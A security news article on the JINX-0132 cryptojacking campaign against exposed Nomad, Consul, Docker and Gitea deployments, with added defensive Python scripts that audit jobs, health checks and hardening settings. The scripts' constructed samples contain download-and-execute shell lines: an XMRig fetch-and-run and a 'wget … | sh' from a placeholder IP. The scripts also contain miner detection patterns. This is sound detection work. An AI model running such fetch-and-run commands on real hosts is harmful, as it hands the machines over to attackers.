Researchers claim to have discovered the first known case of threat actors using misconfigured HashiCorp Nomad deployments as an attack vector.
The popular DevOps platform, which organizations use to deploy and manage both containerized and non-containerized applications, is being targeted alongside other infrastructure, including Gitea, Consul and the Docker Engine API, according to cloud security provider Wiz.
The threat group in question, tracked by Wiz as JINX-0132, is exploiting misconfigurations and vulnerabilities in these DevOps tools for cryptojacking, the report claimed.
Based on Wiz data, a quarter (25%) of all cloud environments run at least one of the targeted technologies. Of the environments that use these tools, 5% expose them directly to the internet, and roughly 30% of those exposed deployments appear to be misconfigured.
Read more about cryptojacking: Malicious Microsoft VS Code extensions used in cryptojacking campaign
JINX-0132 takes advantage of Nomad's job queue, which lets users submit tasks for execution by nodes registered with the Nomad server.
"By default (and critically, if not reconfigured by administrators) any user with access to the Nomad server API can create and run these jobs. This default configuration means that unrestricted access to the server API can be chained into remote code execution (RCE) on the server," Wiz said.
In this way the threat actors create several new jobs on compromised hosts that download the XMRig miner directly from its public GitHub repository, unpack the archive, grant the binary execute permissions and run it.
They also abuse another HashiCorp tool, Consul, which is designed to help DevOps teams manage network connectivity between services and across on-premises and multi-cloud environments and runtimes.
In particular, they hijack Consul's health check feature to run Bash commands that download and execute XMRig payloads.
"Unless ACLs [access control lists] have been configured or the security features provided by HashiCorp have been enabled, any user with remote access to the server can register services and health checks and abuse this functionality for remote code execution," Wiz warned.
JINX-0132 also exploits CVE-2020-14144 in older versions of the open-source GitHub alternative Gitea, as well as misconfigured Docker Engine API deployments. In the latter case, according to the report, the attackers have been able to create containers that launch cryptominer images.
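The Nomad and Consul abuse described above leaves a recognisable shape in the objects an operator can pull back from the APIs: a Nomad task whose driver is `raw_exec` (or `exec`) with a shell command that fetches a GitHub release and runs it, and a Consul service whose health check is a script check (`Args`, or the legacy `Script` field) rather than an HTTP, TCP or TTL check. The following is an added example, not Wiz's tooling or HashiCorp code, showing a small audit over job and service documents in the JSON forms returned by `/v1/job/<id>` and accepted by `PUT /v1/agent/service/register`. The sample payloads, the download URL and the indicator list are constructed for the illustration and are assumptions about what a JINX-0132 job looks like, not artefacts from the report.

```python
"""Flag Nomad jobs and Consul service registrations that look like the JINX-0132
pattern: arbitrary shell commands that fetch and run a miner.

Added example, not Wiz's or HashiCorp's code. The sample documents below are
constructed to mimic API output; they are not real campaign artefacts."""
import re

# Indicators derived from the campaign description in the article (download XMRig
# from GitHub, unpack, chmod +x, run). Assumed starting set, not an official list.
SUSPICIOUS_PATTERNS = [
    re.compile(r"xmrig", re.I),
    re.compile(r"github\.com/\S+/releases/download", re.I),
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", re.I),
    re.compile(r"\bchmod\s+\+x\b", re.I),
]


def _command_text(parts) -> str:
    """Join a command/args list (or a plain string) into one searchable string."""
    if isinstance(parts, str):
        return parts
    return " ".join(str(p) for p in (parts or []))


def _match(cmd: str):
    """Return the first suspicious pattern that matches, or None."""
    for pat in SUSPICIOUS_PATTERNS:
        if pat.search(cmd):
            return pat.pattern
    return None


def audit_nomad_job(job: dict) -> list:
    """Findings for one job document as returned by Nomad's /v1/job/<id> endpoint."""
    findings = []
    for group in job.get("TaskGroups") or []:
        for task in group.get("Tasks") or []:
            cfg = task.get("Config") or {}
            cmd = _command_text([cfg.get("command", "")] + list(cfg.get("args") or []))
            loc = f'{job.get("ID")}/{group.get("Name")}/{task.get("Name")}'
            if task.get("Driver") == "raw_exec":
                # raw_exec runs without isolation, as the user the Nomad client runs as
                findings.append(f"{loc}: task uses the raw_exec driver")
            hit = _match(cmd)
            if hit:
                findings.append(f"{loc}: command matches indicator {hit!r}")
    return findings


def audit_consul_service(svc: dict) -> list:
    """Findings for one service registration (body of PUT /v1/agent/service/register)."""
    findings = []
    checks = list(svc.get("Checks") or [])
    if "Check" in svc:
        checks.append(svc["Check"])
    for chk in checks:
        # Only script checks execute commands on the agent host. "Args" is the
        # current field; "Script" is the legacy one. HTTP/TCP/TTL checks are inert.
        script = chk.get("Args") or chk.get("Script")
        if not script:
            continue
        loc = f'{svc.get("Name")}/{chk.get("Name", "check")}'
        findings.append(f"{loc}: script check executes a command on the agent host")
        hit = _match(_command_text(script))
        if hit:
            findings.append(f"{loc}: command matches indicator {hit!r}")
    return findings


# --- constructed samples (not real data) ---------------------------------------
MINER_JOB = {
    "ID": "sysupdate",
    "TaskGroups": [{"Name": "g", "Tasks": [{
        "Name": "t", "Driver": "raw_exec",
        "Config": {"command": "/bin/bash", "args": ["-c",
            "curl -sL https://github.com/xmrig/xmrig/releases/download/vX.Y/xmrig.tar.gz"
            " | tar xz && chmod +x xmrig/xmrig && ./xmrig/xmrig"]}}]}]}
BENIGN_JOB = {
    "ID": "web",
    "TaskGroups": [{"Name": "web", "Tasks": [{
        "Name": "nginx", "Driver": "docker", "Config": {"image": "nginx:1.27"}}]}]}
MINER_SERVICE = {
    "Name": "healthsvc",
    "Check": {"Name": "hc", "Interval": "30s",
              "Args": ["/bin/bash", "-c", "wget -qO- http://203.0.113.5/x.sh | sh"]}}
BENIGN_SERVICE = {
    "Name": "api",
    "Check": {"Name": "http", "HTTP": "http://localhost:8080/health", "Interval": "10s"}}

if __name__ == "__main__":
    for doc, fn in ((MINER_JOB, audit_nomad_job), (BENIGN_JOB, audit_nomad_job),
                    (MINER_SERVICE, audit_consul_service), (BENIGN_SERVICE, audit_consul_service)):
        print(doc.get("ID") or doc.get("Name"), fn(doc) or "clean")
```

In a real environment the documents would come from `nomad job inspect -json` (or `GET /v1/jobs` followed by `/v1/job/<id>`) and `GET /v1/agent/services`; a script check that exists at all is worth a look, since Wiz's point is that the feature is only reachable by unauthenticated clients when `enable_script_checks` is on and ACLs are off.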
Best practices for DevOps
To avoid becoming another JINX-0132 victim, Wiz urged users of the aforementioned DevOps tools to do the following:
- Nomad: Enable ACLs and the other security features described in the Security Model section of the official documentation
- Gitea: Keep public Gitea instances up to date to prevent exploitation of RCE vulnerabilities, do not enable git hooks, and do not leave the installation unlocked unless absolutely necessary
- Consul: Turn on the security features listed in the Secure Consul section of the official documentation, including disabling script checks and, where possible, limiting the HTTP API to bind only to localhost
- Docker API: Do not bind the Docker API to 0.0.0.0 and do not expose the API to the internet
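Each of the four recommendations maps to a concrete setting in the tool's own configuration file: Nomad's `acl { enabled = true }` block, Consul's `enable_script_checks` / `acl` / HTTP bind address, Docker's `hosts` list in `daemon.json`, and Gitea's `INSTALL_LOCK`, `DISABLE_GIT_HOOKS` and `DISABLE_REGISTRATION` keys in `app.ini`. The following added example (not Wiz's or any vendor's code) audits those settings over the JSON and INI forms the tools read, with a weak and a hardened sample of each constructed inline. Treating an absent Gitea key as "not hardened" is a deliberate conservative choice of this script rather than a statement about Gitea's defaults.

```python
"""Audit the hardening settings behind the best-practice list: Nomad ACLs, Consul
script checks / ACLs / bind address, Docker API bind address, Gitea app.ini keys.

Added example with constructed sample configs; not Wiz's, HashiCorp's, Docker's
or Gitea's code. Nomad and Consul configs are shown in their JSON form
(the HCL `acl { enabled = true }` block is `{"acl": {"enabled": true}}` in JSON)."""
import configparser


def audit_nomad_config(cfg: dict) -> list:
    out = []
    if not (cfg.get("acl") or {}).get("enabled"):
        out.append("nomad: acl.enabled is not true, so any API client can submit jobs")
    return out


def audit_consul_config(cfg: dict) -> list:
    out = []
    if cfg.get("enable_script_checks"):
        out.append("consul: enable_script_checks=true lets remotely registered checks "
                   "run commands; use enable_local_script_checks if scripts are needed")
    acl = cfg.get("acl") or {}
    if not acl.get("enabled") or acl.get("default_policy", "allow") != "deny":
        out.append("consul: ACLs are not enabled with default_policy=deny")
    # addresses.http overrides client_addr for the HTTP API; Consul's default is 127.0.0.1
    http_addr = (cfg.get("addresses") or {}).get("http") or cfg.get("client_addr", "127.0.0.1")
    if "0.0.0.0" in http_addr or "::" in http_addr:
        out.append(f"consul: HTTP API bound to {http_addr!r} instead of localhost")
    return out


def audit_docker_daemon(cfg: dict) -> list:
    out = []
    for h in cfg.get("hosts") or []:
        if not h.startswith("tcp://"):
            continue  # unix:// and fd:// sockets are local only
        host = h[len("tcp://"):].rsplit(":", 1)[0]
        if host in ("", "0.0.0.0", "[::]"):
            out.append(f"docker: API listens on all interfaces via {h!r}")
    return out


def audit_gitea_ini(text: str) -> list:
    ini = configparser.ConfigParser(interpolation=None)
    ini.read_string(text)
    out = []
    # Conservative: every key must be explicitly true, regardless of version defaults.
    if not ini.getboolean("security", "INSTALL_LOCK", fallback=False):
        out.append("gitea: INSTALL_LOCK is not true; the web installer is still reachable")
    if not ini.getboolean("security", "DISABLE_GIT_HOOKS", fallback=False):
        out.append("gitea: DISABLE_GIT_HOOKS is not true; git hooks run server-side code")
    if not ini.getboolean("service", "DISABLE_REGISTRATION", fallback=False):
        out.append("gitea: DISABLE_REGISTRATION is not true; anyone can create an account")
    return out


def audit_all(nomad: dict, consul: dict, docker: dict, gitea_ini: str) -> dict:
    return {"nomad": audit_nomad_config(nomad), "consul": audit_consul_config(consul),
            "docker": audit_docker_daemon(docker), "gitea": audit_gitea_ini(gitea_ini)}


# --- constructed samples: a weak and a hardened configuration for each tool ------
WEAK_NOMAD = {"datacenter": "dc1", "server": {"enabled": True}}          # no acl block
HARD_NOMAD = {"datacenter": "dc1", "server": {"enabled": True}, "acl": {"enabled": True}}
WEAK_CONSUL = {"enable_script_checks": True, "client_addr": "0.0.0.0"}
HARD_CONSUL = {"enable_script_checks": False, "enable_local_script_checks": True,
               "acl": {"enabled": True, "default_policy": "deny"},
               "addresses": {"http": "127.0.0.1"}}
WEAK_DOCKER = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
HARD_DOCKER = {"hosts": ["unix:///var/run/docker.sock"]}
WEAK_GITEA = "[security]\nINSTALL_LOCK = false\n[service]\nDISABLE_REGISTRATION = false\n"
HARD_GITEA = ("[security]\nINSTALL_LOCK = true\nDISABLE_GIT_HOOKS = true\n"
              "[service]\nDISABLE_REGISTRATION = true\n")

if __name__ == "__main__":
    for label, report in (("weak", audit_all(WEAK_NOMAD, WEAK_CONSUL, WEAK_DOCKER, WEAK_GITEA)),
                          ("hardened", audit_all(HARD_NOMAD, HARD_CONSUL, HARD_DOCKER, HARD_GITEA))):
        print(label)
        for tool, findings in report.items():
            print(f"  {tool}: {findings or 'ok'}")
```

Note that Docker refuses to start if `hosts` is set in `daemon.json` while the systemd unit also passes `-H`, so on distributions that ship such a unit the bind address must be checked in the unit's `ExecStart` instead. The Gitea check is configuration only; keeping the instance patched (CVE-2020-14144 is fixed in current releases) is a separate step this script does not assess.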